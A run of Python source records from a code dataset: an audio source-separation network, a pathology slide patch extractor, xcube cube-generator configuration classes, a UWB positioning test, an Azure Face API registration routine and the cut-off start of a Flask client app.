self.x_mixed[:,:,:512]\r\n input_layer = tf.expand_dims(self.x_mixed, -1) # ?*10*513*1\r\n input_layer = tf.transpose(input_layer, [0, 2, 1, 3]) # ?*513*10*1\r\n\r\n conv1_time = tf.layers.batch_normalization(\r\n tf.layers.conv2d(inputs=input_layer, filters=16, kernel_size=[2, 10], strides=[1, 1], padding=\"same\",\r\n activation=tf.nn.leaky_relu))\r\n conv1_freq = tf.layers.batch_normalization(\r\n tf.layers.conv2d(inputs=input_layer, filters=16, kernel_size=[10, 2], strides=[1, 1], padding=\"same\",\r\n activation=tf.nn.leaky_relu))\r\n conv1 = tf.concat([conv1_time, conv1_freq], axis=-1)\r\n conv2 = tf.layers.batch_normalization(\r\n tf.layers.conv2d(inputs=conv1, filters=48, kernel_size=[2, 2], strides=[1, 1], padding=\"same\",\r\n activation=tf.nn.leaky_relu)) # ?*513*10*64\r\n conv3 = tf.layers.batch_normalization(\r\n tf.layers.conv2d(inputs=conv2, filters=64, kernel_size=[2, 2], strides=[1, 1], padding=\"same\",\r\n activation=tf.nn.leaky_relu)) # ?*513*10*64\r\n\r\n conv4 = tf.layers.batch_normalization(\r\n tf.layers.conv2d(inputs=conv3, filters=80, kernel_size=[2, 2], strides=[1, 1], padding=\"same\",\r\n activation=tf.nn.leaky_relu)) # ?*513*10*64\r\n\r\n # conv4 = self_Att_channel(x=conv4, x_att=conv4, r=64, name='conv2')\r\n conv5 = tf.layers.batch_normalization(\r\n tf.layers.conv2d(inputs=conv4, filters=128, kernel_size=[2, 2], strides=[1, 1], padding=\"same\",\r\n activation=tf.nn.leaky_relu)) # ?*513*10*64\r\n conv5 = self_Att_channel(conv5,conv5,r=4,name='conv5')\r\n layer1 = tf.nn.max_pool(conv5, ksize=[1, 2, 1, 1], strides=[1, 2, 1, 1], padding='VALID',\r\n name='max_pool') # ?*256*10*64\r\n layer1 = tf.transpose(layer1, [0, 2, 1, 3]) # (?*?*256*64)\r\n\r\n layer = layer1[:, :, :, 0]\r\n for i in range(1, 128):\r\n # layer = layer\r\n layer_ = layer1[:, :, :, i]\r\n layer = tf.concat([layer, layer_], axis=-1) # layer1:(?*?*16384)\r\n\r\n # input_layer = cnv(input_layer, 1) # ?*513*10*1\r\n # inp = tf.squeeze(input_layer, axis=-1) # ?*513*10\r\n # inp = tf.transpose(inp, [0, 2, 1]) # ?*10*513\r\n layer = tf.concat([layer, self.x_mixed], axis=-1) # ?*?*(16384+513)\r\n\r\n\r\n rnn_layer = [tf.nn.rnn_cell.GRUCell(size) for size in self.num_hidden_units]\r\n multi_rnn_cell = tf.nn.rnn_cell.MultiRNNCell(rnn_layer)\r\n outputs, state = tf.nn.dynamic_rnn(cell=multi_rnn_cell, inputs=layer,\r\n dtype=tf.float32) # outputs:(?,?,256) state:(?,256) inputs:?*10*513\r\n y_hat_src1 = tf.layers.dense( # y_hat_src1: shape=(?, 10, 513)\r\n inputs=outputs,\r\n units=self.num_features,\r\n activation=tf.nn.relu,\r\n name='y_hat_src1')\r\n y_hat_src2 = tf.layers.dense(\r\n inputs=outputs,\r\n units=self.num_features,\r\n activation=tf.nn.relu,\r\n name='y_hat_src2')\r\n\r\n # Time-frequency masking layer时频掩膜\r\n # np.finfo(float).eps: the smallest representable positive number such that 1.0 + eps != 1.0\r\n # Absolute value? In principle y_srcs could only be positive in spectrogram\r\n y_tilde_src1 = y_hat_src1 / (\r\n y_hat_src1 + y_hat_src2 + np.finfo(float).eps) * self.x_mixed # y_hat_src1: shape=(?, ?, 513)\r\n y_tilde_src2 = y_hat_src2 / (y_hat_src1 + y_hat_src2 + np.finfo(float).eps) * self.x_mixed\r\n # Mask with Abs\r\n # y_tilde_src1 = tf.abs(y_hat_src1) / (tf.abs(y_hat_src1) + tf.abs(y_hat_src2) + np.finfo(float).eps) * self.x_mixed\r\n # y_tilde_src2 = tf.abs(y_hat_src2) / (tf.abs(y_hat_src1) + tf.abs(y_hat_src2) + np.finfo(float).eps) * self.x_mixed\r\n\r\n return y_tilde_src1, y_tilde_src2\r\n # return y_hat_src1, y_hat_src2\r\n\r\n def network_initializer(self):\r\n\r\n with tf.variable_scope('rnn_network') as scope:\r\n y_pred_src1, y_pred_src2 = self.network()\r\n\r\n return y_pred_src1, y_pred_src2\r\n\r\n def generalized_kl_divergence(self, y, y_hat):\r\n\r\n return tf.reduce_mean(y * tf.log(y / y_hat) - y + y_hat)\r\n\r\n def loss_initializer(self):\r\n\r\n with tf.variable_scope('loss') as scope:\r\n # Mean Squared Error Loss\r\n # loss = tf.reduce_mean(tf.square(self.y_src1 - self.y_pred_src1) + tf.square(self.y_src2 - self.y_pred_src2), name = 'loss') #\r\n # loss = tf.add(\r\n # x=self.generalized_kl_divergence(y=self.y_src1, y_hat=self.y_pred_src1),\r\n # y=self.generalized_kl_divergence(y=self.y_src2, y_hat=self.y_pred_src2),\r\n # name='GKL_loss')\r\n '''\r\n # Generalized KL Divergence Loss\r\n loss = tf.add(\r\n x = self.generalized_kl_divergence(y = self.y_src1, y_hat = self.y_pred_src1), \r\n y = self.generalized_kl_divergence(y = self.y_src2, y_hat = self.y_pred_src2), \r\n name = 'GKL_loss')\r\n\r\n # Mean Squared Error + Signal to Inference Ratio Loss\r\n loss = tf.reduce_mean(tf.square(self.y_src1 - self.y_pred_src1) + tf.square(self.y_src2 - self.y_pred_src2) - self.gamma * (tf.square(self.y_src1 - self.y_pred_src2) + tf.square(self.y_src2 - self.y_pred_src1)), name = 'MSE_SIR_loss')\r\n\r\n # Generalized KL Divergence + Signal to Inference Ratio Loss\r\n loss = tf.subtract(\r\n x = (self.generalized_kl_divergence(y = self.y_src1, y_hat = self.y_pred_src1) + self.generalized_kl_divergence(y = self.y_src2, y_hat = self.y_pred_src2)), \r\n y = self.gamma * (self.generalized_kl_divergence(y = self.y_src1, y_hat = self.y_pred_src2) + self.generalized_kl_divergence(y = self.y_src2, y_hat = self.y_pred_src1)), \r\n name = 'GKL_SIR_loss')\r\n '''\r\n loss = tf.reduce_mean(\r\n tf.square(self.y_src1 - self.y_pred_src1) + tf.square(self.y_src2 - self.y_pred_src2) - self.gamma * (\r\n tf.square(self.y_src1 - self.y_pred_src2) + tf.square(self.y_src2 - self.y_pred_src1)),\r\n name='MSE_SIR_loss')\r\n\r\n return loss\r\n\r\n def optimizer_initializer(self):\r\n\r\n optimizer = tf.train.AdamOptimizer(learning_rate=self.learning_rate).minimize(self.loss, global_step=self.gstep)\r\n\r\n return optimizer\r\n\r\n def train(self, x, y1, y2, learning_rate):\r\n\r\n # step = self.gstep.eval()\r\n\r\n step = self.sess.run(self.gstep)\r\n\r\n _, train_loss, summaries = self.sess.run([self.optimizer, self.loss, self.summary_op],\r\n feed_dict={self.x_mixed: x, self.y_src1: y1, self.y_src2: y2,\r\n self.learning_rate: learning_rate}) # x_mixed:(64,10,513)\r\n self.writer.add_summary(summaries, global_step=step)\r\n return train_loss\r\n\r\n def validate(self, x, y1, y2):\r\n\r\n y1_pred, y2_pred, validate_loss = self.sess.run([self.y_pred_src1, self.y_pred_src2, self.loss],\r\n feed_dict={self.x_mixed: x, self.y_src1: y1, self.y_src2: y2})\r\n return y1_pred, y2_pred, validate_loss\r\n\r\n def test(self, x):\r\n\r\n y1_pred, y2_pred = self.sess.run([self.y_pred_src1, self.y_pred_src2], feed_dict={self.x_mixed: x})\r\n\r\n return y1_pred, y2_pred\r\n\r\n def save(self, directory, filename):\r\n\r\n if not os.path.exists(directory):\r\n os.makedirs(directory)\r\n self.saver.save(self.sess, os.path.join(directory, filename))\r\n return os.path.join(directory, filename)\r\n\r\n def load(self, filepath):\r\n\r\n self.saver.restore(self.sess, filepath)\r\n\r\n def summary(self):\r\n '''\r\n Create summaries to write on TensorBoard\r\n '''\r\n with tf.name_scope('summaries'):\r\n tf.summary.scalar('loss', self.loss)\r\n tf.summary.histogram('x_mixed', self.x_mixed)\r\n tf.summary.histogram('y_src1', self.y_src1)\r\n tf.summary.histogram('y_src2', self.y_src2)\r\n summary_op = tf.summary.merge_all()\r\n\r\n return summary_op","sub_path":"gamma_5_hop2r4.py","file_name":"gamma_5_hop2r4.py","file_ext":"py","file_size_in_byte":12539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"575636032","text":"from skimage.external import tifffile\r\nimport matplotlib.pyplot as plt\r\nimport cv2\r\nimport glob\r\nimport os\r\nimport numpy as np\r\nfrom PIL import Image\r\nimport openslide\r\nimport shutil\r\n#dataset_path='/media/disk/han/dataset/seg_viable/'\r\ntumor_abs_path = '/media/disk/han/dataset/Segmentation_whole/'\r\n\r\n\r\nfor i in range(23,41):\r\n\r\n if not os.path.exists('/media/disk/han/dataset/Segmentation_whole/whole_label_image/{0:03d}'.format(i) ):\r\n os.mkdir('/media/disk/han/dataset/Segmentation_whole/whole_label_image/{0:03d}'.format(i) )\r\n if not os.path.exists('/media/disk/han/dataset/Segmentation_whole/original_image/{0:03d}'.format(i) ):\r\n os.mkdir('/media/disk/han/dataset/Segmentation_whole/original_image/{0:03d}'.format(i))\r\n\r\n wsi_list=glob.glob('/media/disk/han/dataset/svs_tif/{0:03d}'.format(i)+'/*.svs')\r\n wsi_list2=glob.glob('/media/disk/han/dataset/svs_tif/{0:03d}'.format(i)+'/*.SVS')\r\n if len(wsi_list2)>0:\r\n wsi_list.append(wsi_list2[0])\r\n file_list = glob.glob('/media/disk/han/dataset/svs_tif/{0:03d}'.format(i) + '/*.tif')\r\n file_name = file_list[0].split(\"\\\\\")\r\n file_name = file_name[-1].split('.')\r\n file = file_name[0].split('_')\r\n\r\n\r\n\r\n wsi_img=openslide.OpenSlide(wsi_list[0])\r\n if file[3] == 'viable':\r\n viable_path = file_list[0]\r\n tumor_path = file_list[1]\r\n else:\r\n tumor_path = file_list[0]\r\n viable_path = file_list[1]\r\n\r\n tumor_img = tifffile.imread(tumor_path)\r\n viable_img = tifffile.imread(viable_path)\r\n h, w = tumor_img.shape\r\n\r\n for j in range(0, h, 1024):\r\n for k in range(0, w, 1024):\r\n\r\n t_img = np.array(tumor_img[j:j + 1024, k:k + 1024])\r\n\r\n if t_img.shape != (1024, 1024):\r\n continue\r\n\r\n patch=wsi_img.read_region((k,j),0,(1024,1024)).convert('RGB')\r\n a=np.array(patch)\r\n B, G, R = cv2.split(a)\r\n _, B = cv2.threshold(B, 235, 1, cv2.THRESH_BINARY)\r\n _, G = cv2.threshold(G, 210, 1, cv2.THRESH_BINARY)\r\n _, R = cv2.threshold(R, 235, 1, cv2.THRESH_BINARY)\r\n\r\n background_label_img = B * G * R\r\n forground_label_img = np.ones((1024, 1024)) - background_label_img\r\n\r\n if forground_label_img.sum() < 209715:\r\n continue\r\n\r\n path='/media/disk/han/dataset/Segmentation_whole/original_image/{0:03d}/{1}_{2}.png'.format(i,j,k)\r\n patch.save(path)\r\n\r\n _, t_img = cv2.threshold(t_img, 0.5, 255, cv2.THRESH_BINARY)\r\n cv2.imwrite(\r\n '/media/disk/han/dataset/Segmentation_whole/whole_label_image/{0:03d}/'.format(i) + str(j) + '_' + str(\r\n k ) + '.png', t_img)\r\n\r\n shutil.copy(original_path,\r\n '/media/disk/han/dataset/Segmentation_whole/whole_label_image/{0:03d}/'.format(i) + str(j) + '_' + str(\r\n k ) + '.png')\r\n\r\n\r\n","sub_path":"preprocessing/make_whole_label_image_for_segmentation2.py","file_name":"make_whole_label_image_for_segmentation2.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"190615142","text":"# The MIT License (MIT)\n# Copyright (c) 2020 by the xcube development team and contributors\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy of\n# this software and associated documentation files (the \"Software\"), to deal in\n# the Software without restriction, including without limitation the rights to\n# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies\n# of the Software, and to permit persons to whom the Software is furnished to do\n# so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport json\nimport os.path\nimport sys\nfrom typing import Optional, Dict, Any, Sequence, Mapping, Tuple\n\nimport jsonschema\nimport yaml\n\nfrom xcube.cli._gen2.error import GenError\nfrom xcube.util.assertions import assert_condition\nfrom xcube.util.assertions import assert_given\nfrom xcube.util.jsonschema import JsonArraySchema\nfrom xcube.util.jsonschema import JsonBooleanSchema\nfrom xcube.util.jsonschema import JsonDateSchema\nfrom xcube.util.jsonschema import JsonNumberSchema\nfrom xcube.util.jsonschema import JsonObjectSchema\nfrom xcube.util.jsonschema import JsonStringSchema\n\n\nclass InputConfig:\n def __init__(self,\n store_id: str = None,\n opener_id: str = None,\n data_id: str = None,\n store_params: Mapping[str, Any] = None,\n open_params: Mapping[str, Any] = None):\n assert_condition(store_id or opener_id, 'One of store_id and opener_id must be given')\n assert_given(data_id, 'data_id')\n self.store_id = store_id\n self.opener_id = opener_id\n self.data_id = data_id\n self.store_params = store_params or {}\n self.open_params = open_params or {}\n\n @classmethod\n def get_schema(cls) -> JsonObjectSchema:\n return JsonObjectSchema(\n properties=dict(\n store_id=JsonStringSchema(min_length=1),\n opener_id=JsonStringSchema(min_length=1),\n data_id=JsonStringSchema(min_length=1),\n store_params=JsonObjectSchema(additional_properties=True),\n open_params=JsonObjectSchema(additional_properties=True)\n ),\n additional_properties=False,\n required=['data_id'],\n factory=cls,\n )\n\n def to_dict(self):\n d = dict()\n if self.store_id:\n d.update(store_id=str(self.store_id))\n if self.opener_id:\n d.update(writer_id=str(self.opener_id))\n if self.data_id:\n d.update(data_id=str(self.data_id))\n if self.store_params:\n d.update(store_params=dict(self.store_params))\n if self.open_params:\n d.update(open_params=dict(self.open_params))\n return d\n\n\nclass CallbackConfig:\n def __init__(self,\n api_uri: str = None,\n access_token: str = None):\n assert_condition(api_uri and access_token, 'Both, api_uri and access_token must be given')\n self.api_uri = api_uri\n self.access_token = access_token\n\n @classmethod\n def get_schema(cls):\n return JsonObjectSchema(\n properties=dict(\n api_uri=JsonStringSchema(min_length=1),\n access_token=JsonStringSchema(min_length=1)\n ),\n additional_properties=False,\n required=[\"api_uri\", \"access_token\"],\n factory=cls,\n )\n\n def to_dict(self) -> dict:\n d = dict()\n if self.api_uri:\n d.update(api_uri=self.api_uri)\n if self.access_token:\n d.update(access_token=self.access_token)\n\n return d\n\n\nclass OutputConfig:\n\n def __init__(self,\n store_id: str = None,\n writer_id: str = None,\n data_id: str = None,\n store_params: Mapping[str, Any] = None,\n write_params: Mapping[str, Any] = None,\n replace: bool = None):\n assert_condition(store_id or writer_id, 'One of store_id and writer_id must be given')\n self.store_id = store_id\n self.writer_id = writer_id\n self.data_id = data_id\n self.store_params = store_params or {}\n self.write_params = write_params or {}\n self.replace = replace\n\n @classmethod\n def get_schema(cls):\n return JsonObjectSchema(\n properties=dict(\n store_id=JsonStringSchema(min_length=1),\n writer_id=JsonStringSchema(min_length=1),\n data_id=JsonStringSchema(default=None),\n store_params=JsonObjectSchema(additional_properties=True),\n write_params=JsonObjectSchema(additional_properties=True),\n replace=JsonBooleanSchema(default=False),\n ),\n additional_properties=False,\n required=[],\n factory=cls,\n )\n\n def to_dict(self):\n d = dict()\n if self.store_id:\n d.update(store_id=str(self.store_id))\n if self.writer_id:\n d.update(writer_id=str(self.writer_id))\n if self.data_id:\n d.update(data_id=str(self.data_id))\n if self.store_params:\n d.update(store_params=dict(self.store_params))\n if self.write_params:\n d.update(write_params=dict(self.write_params))\n if self.replace:\n d.update(replace=True)\n return d\n\n\n# Need to be aligned with params in resample_cube(cube, **params)\nclass CubeConfig:\n\n def __init__(self,\n variable_names: Sequence[str] = None,\n crs: str = None,\n bbox: Tuple[float, float, float, float] = None,\n spatial_res: float = None,\n time_range: Tuple[str, Optional[str]] = None,\n time_period: str = None):\n assert_given(variable_names, 'variable_names')\n assert_given(bbox, 'bbox')\n assert_given(spatial_res, 'spatial_res')\n assert_given(time_range, 'time_range')\n self.variable_names = tuple(variable_names)\n self.crs = str(crs)\n self.bbox = tuple(bbox)\n self.spatial_res = float(spatial_res)\n self.time_range = tuple(time_range)\n self.time_period = str(time_period)\n\n def to_dict(self):\n d = dict(\n variable_names=list(self.variable_names),\n bbox=list(self.bbox),\n spatial_res=float(self.spatial_res),\n time_range=list(self.time_range)\n )\n if self.crs:\n d.update(crs=str(self.crs))\n if self.time_period:\n d.update(time_period=str(self.time_period))\n return d\n\n @classmethod\n def get_schema(cls):\n return JsonObjectSchema(\n properties=dict(\n variable_names=JsonArraySchema(\n items=JsonStringSchema(min_length=1),\n min_items=0\n ),\n crs=JsonStringSchema(\n nullable=True,\n min_length=1\n ),\n bbox=JsonArraySchema(\n nullable=True,\n items=[JsonNumberSchema(),\n JsonNumberSchema(),\n JsonNumberSchema(),\n JsonNumberSchema()]),\n spatial_res=JsonNumberSchema(\n nullable=True,\n exclusive_minimum=0.0),\n time_range=JsonDateSchema.new_range(\n nullable=True\n ),\n time_period=JsonStringSchema(\n nullable=True,\n pattern=r'^([1-9][0-9]*)?[DWMY]$'\n ),\n ),\n required=['variable_names'],\n additional_properties=False,\n factory=cls\n )\n\n\nclass GenConfig:\n def __init__(self,\n input_config: InputConfig = None,\n input_configs: Sequence[InputConfig] = None,\n cube_config: CubeConfig = None,\n output_config: OutputConfig = None,\n callback_config: Optional[CallbackConfig] = None):\n assert_condition(input_config or input_configs, 'one of input_config and input_configs must be given')\n assert_condition(not (input_config and input_configs), 'input_config and input_configs cannot be given both')\n if input_config:\n input_configs = [input_config]\n assert_given(input_configs, 'input_configs')\n assert_given(cube_config, 'cube_config')\n assert_given(output_config, 'output_config')\n self.input_configs = input_configs\n self.cube_config = cube_config\n self.output_config = output_config\n self.callback_config = callback_config\n\n @classmethod\n def get_schema(cls):\n return JsonObjectSchema(\n properties=dict(\n input_config=InputConfig.get_schema(),\n input_configs=JsonArraySchema(items=InputConfig.get_schema(), min_items=1),\n cube_config=CubeConfig.get_schema(),\n output_config=OutputConfig.get_schema(),\n callback_config=CallbackConfig.get_schema()\n ),\n required=['cube_config', 'output_config'],\n factory=cls,\n )\n\n def to_dict(self) -> Mapping[str, Any]:\n \"\"\"Convert into a JSON-serializable dictionary\"\"\"\n if len(self.input_configs) == 1:\n d = dict(input_config=self.input_configs[0].to_dict())\n else:\n d = dict(input_configs=[ic.to_dict() for ic in self.input_configs])\n\n d.update(cube_config=self.cube_config.to_dict(),\n output_config=self.output_config.to_dict())\n\n if self.callback_config:\n d.update(callback_config=self.callback_config.to_dict())\n\n return d\n\n @classmethod\n def from_dict(cls, request_dict: Dict) -> 'GenConfig':\n \"\"\"Create new instance from a JSON-serializable dictionary\"\"\"\n try:\n return cls.get_schema().from_instance(request_dict)\n except jsonschema.exceptions.ValidationError as e:\n raise GenError(f'{e}') from e\n\n @classmethod\n def from_file(cls, request_file: Optional[str], verbose=False) -> 'GenConfig':\n \"\"\"Create new instance from a JSON file, or YAML file, or JSON passed via stdin.\"\"\"\n gen_config_dict = cls._load_gen_config_file(request_file, verbose=verbose)\n if verbose:\n print(f'Cube generator configuration loaded from {request_file or \"TTY\"}.')\n return cls.from_dict(gen_config_dict)\n\n @classmethod\n def _load_gen_config_file(cls, gen_config_file: Optional[str], verbose=False) -> Dict:\n\n if gen_config_file is not None and not os.path.exists(gen_config_file):\n raise GenError(f'Cube generator configuration \"{gen_config_file}\" not found.')\n\n try:\n if gen_config_file is None:\n if not sys.stdin.isatty():\n if verbose:\n print('Awaiting generator configuration JSON from TTY...')\n return json.load(sys.stdin)\n else:\n with open(gen_config_file, 'r') as fp:\n if gen_config_file.endswith('.json'):\n return json.load(fp)\n else:\n return yaml.safe_load(fp)\n except BaseException as e:\n raise GenError(f'Error loading generator configuration \"{gen_config_file}\": {e}') from e\n\n raise GenError(f'Missing cube generator configuration.')\n","sub_path":"xcube/cli/_gen2/genconfig.py","file_name":"genconfig.py","file_ext":"py","file_size_in_byte":12188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"330012818","text":"# -*- coding:utf-8 -*-\n# carete by steve at 2018 / 05 / 13 下午2:37\n'''\n _ooOoo_ \n o8888888o \n 88\" . \"88 \n (| -_- |) \n O\\ = /O \n ____/`---'\\____ \n .' \\\\| |// `. \n / \\\\||| : |||// \\ \n / _||||| -:- |||||- \\ \n | | \\\\\\ - /// | | \n | \\_| ''\\---/'' | | \n \\ .-\\__ `-` ___/-. / \n ___`. .' /--.--\\ `. . __ \n .\"\" '< `.___\\_<|>_/___.' >'\"\". \n | | : `- \\`.;`\\ _ /`;.`/ - ` : | | \n \\ \\ `-. \\_ __\\ /__ _/ .-` / / \n======`-.____`-.___\\_____/___.-`____.-'====== \n `=---=' \n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ \n 佛祖保佑 永无BUG \n'''\n\nimport numpy as np\nimport scipy as sp\nfrom scipy import interpolate\nimport matplotlib.pyplot as plt\n\nfrom numba import jit\n\nimport matplotlib\nfrom mpl_toolkits.mplot3d import Axes3D\nimport time\n\nfrom PositioningAlgorithm.OptimizationAlgorithm.UwbOptimizeLocation import UwbOptimizeLocation\n\nfrom AlgorithmTool.ReferTraceEvaluateTools import *\n\nif __name__ == '__main__':\n matplotlib.use('Qt5Agg')\n # matplotlib.rcParams['toolbar'] = 'toolmanager'\n start_time = time.time()\n # dir_name = '/home/steve/Data/FusingLocationData/0017/'\n # dir_name = '/home/steve/Data/FusingLocationData/0013/'\n dir_name = '/home/steve/Data/NewFusingLocationData/0045/'\n\n # uwb_data = np.loadtxt(dir_name + 'uwb_result.csv', delimiter=',')\n # beacon_set = np.loadtxt(dir_name + 'beaconSet.csv', delimiter=',')\n uwb_data = np.loadtxt(dir_name + 'uwb_data.csv', delimiter=',')\n # beacon_set = np.loadtxt(dir_name + 'beaconset_no_mac.csv', delimiter=',')\n beacon_set = np.loadtxt(dir_name + 'beaconset_fill.csv', delimiter=',')\n\n uol = UwbOptimizeLocation(beacon_set)\n uwb_trace = np.zeros([uwb_data.shape[0], 3])\n uwb_opt_res = np.zeros([uwb_data.shape[0]])\n\n for i in range(uwb_data.shape[0]):\n if i is 0:\n uwb_trace[i, :], uwb_opt_res[i] = \\\n uol.iter_positioning((0, 0, 0),\n uwb_data[i, 1:])\n else:\n uwb_trace[i, :], uwb_opt_res[i] = \\\n uol.iter_positioning(uwb_trace[i - 1, :],\n uwb_data[i, 1:])\n\n\n @jit(nopython=True, cache=True)\n def compute_z_ave(uwb_trace, low_b=2.0, high_b=3.0):\n counter = 0\n the_sum = 0.0\n for i in range(uwb_trace.shape[0]):\n if low_b < uwb_trace[i, 2] < high_b:\n counter += 1\n the_sum += uwb_trace[i, 2]\n\n return float(the_sum) / float(counter)\n\n\n average_high = compute_z_ave(uwb_trace)\n print(average_high)\n\n # write acceptable data to file\n t_file = open(dir_name + 'selected_uwb_trace.csv', 'w')\n rc = Refscor(dir_name)\n\n t_trace = np.zeros_like(uwb_trace)\n for i in range(uwb_trace.shape[0]):\n if rc.eval_point2d(uwb_trace[i, :2]) < 0.5 and abs(uwb_trace[i, 2] - average_high) < 0.5:\n t_trace[i, :] = uwb_trace[i, :]\n t_file.write(\"%15.15f,%15.15f,%15.15f,%15.15f\\n\" % (\n uwb_data[i, 0], uwb_trace[i, 0], uwb_trace[i, 1], uwb_trace[i, 2]))\n\n t_file.close()\n\n plt.figure()\n plt.title('measuremment & res')\n for i in range(1, uwb_data.shape[1]):\n if uwb_data[:, i].max() > 0.0:\n plt.plot(uwb_data[:, 0], uwb_data[:, i], '+', label=str(i))\n plt.plot(uwb_data[:, 0], uwb_opt_res, '-*', label='res')\n plt.legend()\n plt.grid()\n\n # plt.figure()\n # plt.title('z value')\n # plt.hist(uwb_trace[:, 2], bins=100)\n # plt.grid()\n\n plt.figure()\n plt.title('uwb trace')\n plt.plot(uwb_trace[:, 0], uwb_trace[:, 1], label='source uwb')\n plt.plot(t_trace[:, 0], t_trace[:, 1], '*', label='t trace')\n plt.grid()\n plt.legend()\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.set_title(\"trace 3d\")\n ax.plot(uwb_trace[:, 0], uwb_trace[:, 1], uwb_trace[:, 2], '-+', label='source uwb')\n ax.plot(t_trace[:, 0], t_trace[:, 1], t_trace[:, 2], '*', label='t trace\\\\beta')\n ax.grid()\n ax.legend()\n\n # ref_trace = np.loadtxt(dir_name+'selected_uwb_trace.csv',delimiter=',')\n # smooth_fac = 0.5\n # xf = sp.interpolate.UnivariateSpline(ref_trace[:,0],ref_trace[:,1])\n # yf = sp.interpolate.UnivariateSpline(ref_trace[:,0],ref_trace[:,2])\n # xf.set_smoothing_factor(smooth_fac)\n # yf.set_smoothing_factor(smooth_fac)\n\n # plt.figure()\n # plt.title('ref and interpolate')\n # plt.plot(ref_trace[:,1],ref_trace[:,2],label='ref')\n # plt.plot(xf(uwb_data[:,0]),yf(uwb_data[:,0]),label='inter')\n # plt.grid()\n # plt.legend()\n\n plt.show()\n","sub_path":"PositioningAlgorithm/tester/ReliableUwbTraceWithRefTraceTest.py","file_name":"ReliableUwbTraceWithRefTraceTest.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"430391421","text":"###############################################\n## API New Person Training\n## (1) Add Person object (container)\n## (2) Attach new faces\n## (3) Retrain PersonGroup container\n## Created by: Jixin Jia (05-Jan-2018)\n##############################################\n\n'''\nAPI Interface\n(1) Face API PersonGroup -AddPerson\n -input: config.personGroupId\n -output: personId\n(2) Face API PersonGroup -Person -AddFace\n -input: config.personGroupId, personId\n -output: persistedFaceId\n(3) Face API PersonGroup -Train\n -input: config.personGroupId\n -output: N/A\n'''\n\nimport urllib.parse, json, requests, time , config, os\nfrom random import randint\n\ndef registerface(userName, userPhone):\n \n personId = None\n faceCount = 0\n statusMsg = None\n statusCode = 0\n randId = str(randint(1000,9999))\n\n if not userName:\n userName = 'Guest '+str(randId)\n \n if not userPhone:\n userPhone = 'Not provided'\n\n #### (1) Create Person ####\n headersAddPerson = {\n 'Content-Type': 'application/json',\n 'Ocp-Apim-Subscription-Key': config.APIKey,\n }\n bodyAddPerson = { 'name': userName, 'Userdata': userPhone }\n bodyAddPerson = json.dumps(bodyAddPerson)\n \n r = requests.post(config.urlAPI+\"/persongroups/\"+config.personGroupId+\"/persons\", headers=headersAddPerson, data=bodyAddPerson)\n res = r.json()\n \n if r.status_code == 200:\n personId = res['personId']\n \n #### (2) Add person & face(s) to PersonGroup ####\n headersAddFace = {\n 'Content-Type': 'application/octet-stream',\n 'Ocp-Apim-Subscription-Key': config.APIKey,\n }\n\n if len(os.listdir(config.filePath)) >0 :\n for filename in os.listdir(config.filePath):\n if filename.endswith(\".jpg\") or filename.endswith(\".png\"): \n imageFile = open(config.filePath+'/'+filename,'rb')\n bodyAddFace = imageFile.read()\n imageFile.close()\n\n r2 = requests.post(config.urlAPI+\"/persongroups/\"+config.personGroupId+\"/persons/\"+personId+\"/persistedFaces\", headers=headersAddFace, data=bodyAddFace)\n \n if r2.status_code == 200:\n faceCount += 1\n continue\n else:\n continue\n else:\n statusMsg = \"No faces detected !\" \n\n #### (3) Train the PersonGroup with newly added Person & Face ####\n if faceCount >0 :\n headersTrain = {\n 'Ocp-Apim-Subscription-Key': config.APIKey\n }\n \n r3 = requests.post(config.urlAPI+\"/persongroups/\"+config.personGroupId+\"/train\", headers=headersTrain)\n \n while True:\n r4 = requests.get(config.urlAPI+\"/persongroups/\"+config.personGroupId+\"/training\", headers=headersTrain)\n res4 = r4.json()\n \n if r4.status_code == 200 and res4['status'] == 'succeeded' :\n statusMsg = \"Successfully Registered \" + userName + \" !\"\n statusCode = 200\n break\n \n elif r4.status_code == 200 and res4['status'] != 'succeeded':\n time.sleep(5)\n continue\n \n else:\n statusMsg = \"Registration Failed. Try Again Later\"\n break\n else:\n statusMsg = \"No new faces available for registration\"\n else:\n statusMsg = \"Server Error ! Try Again\"\n\n return statusCode, statusMsg\n \n\n\n\n","sub_path":"apitrain.py","file_name":"apitrain.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"479541891","text":"from flask import Flask\nfrom flask import render_template\nfrom flask import request\nfrom flask import redirect\n\nfrom client import get_client_list, get_client_by_id, add_client, update_client\nfrom forms import NewClientForm\n\napp = Flask(__name__)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n clients = get_client_list()\n form = NewClientForm(request.form)\n if request.method == 'POST' and form.validate():\n data = {\n 'firstname': form.name.data,\n 'lastname': form.last_name.data,\n 'emailaddress1': form.email.data,\n 'telephone1': form.phone_number.data,\n }\n add_client(data)\n return redirect('/')\n return render_template('index.html', clients=clients, form=form)\n\n\n@app.route('/update_phone_number/', methods=['GET'])\ndef update_phone_number(contactid):\n client = get_client_by_id(contactid)\n clean_phone_number = ''.join(c for c in client['telephone1'] if 